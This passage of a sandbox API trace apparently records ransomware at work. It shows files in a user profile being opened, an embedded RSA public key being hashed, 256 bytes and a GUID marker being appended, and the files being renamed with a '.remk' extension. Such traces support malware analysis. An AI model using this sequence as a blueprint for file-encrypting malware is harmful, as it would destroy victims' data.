| out: hHeap=0x630000) returned 1 [0234.099] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.101] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0234.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0234.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.102] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0234.102] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.105] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.105] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.106] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.107] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.107] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.108] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.108] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.108] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.108] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.108] GetLastError () returned 0x0 [0234.108] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.108] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.108] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.108] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.109] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.109] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbe88 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5f8 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbed0 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.109] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee658 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee640 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.110] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee640 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.111] GetCurrentThreadId () returned 0x314 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c29e0 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.111] GetCurrentThreadId () returned 0x314 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.112] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.112] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.112] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.112] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.113] CloseHandle (hObject=0x640) returned 1 [0234.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.114] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.remk")) returned 1 [0234.116] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0234.116] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.116] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.116] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\") returned="Gg6LaR4dxDzOQomZJ1UL\\" [0234.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0234.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0234.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0234.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbed0 [0234.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.117] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.117] PathFindFileNameW (pszPath="") returned="" [0234.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.118] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.118] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569034e0, ftCreationTime.dwHighDateTime=0x1d5dcaa, ftLastAccessTime.dwLowDateTime=0xc6d322b0, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0xc6d322b0, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xe911, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3557nrWiSL8Oztuk2v.mp3", cAlternateFileName="3557NR~1.MP3")) returned 1 [0234.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.119] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\3557nrWiSL8Oztuk2v.mp3") returned=".mp3" [0234.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\3557nrWiSL8Oztuk2v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\3557nrwisl8oztuk2v.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.122] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59665) returned 1 [0234.122] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.125] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe8eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.125] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.127] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe911, lpOverlapped=0x0) returned 1 [0234.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.128] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.129] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.129] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.129] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.129] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.129] GetLastError () returned 0x0 [0234.129] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.129] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.130] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.130] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.130] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.130] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.131] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe911, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.131] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.131] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 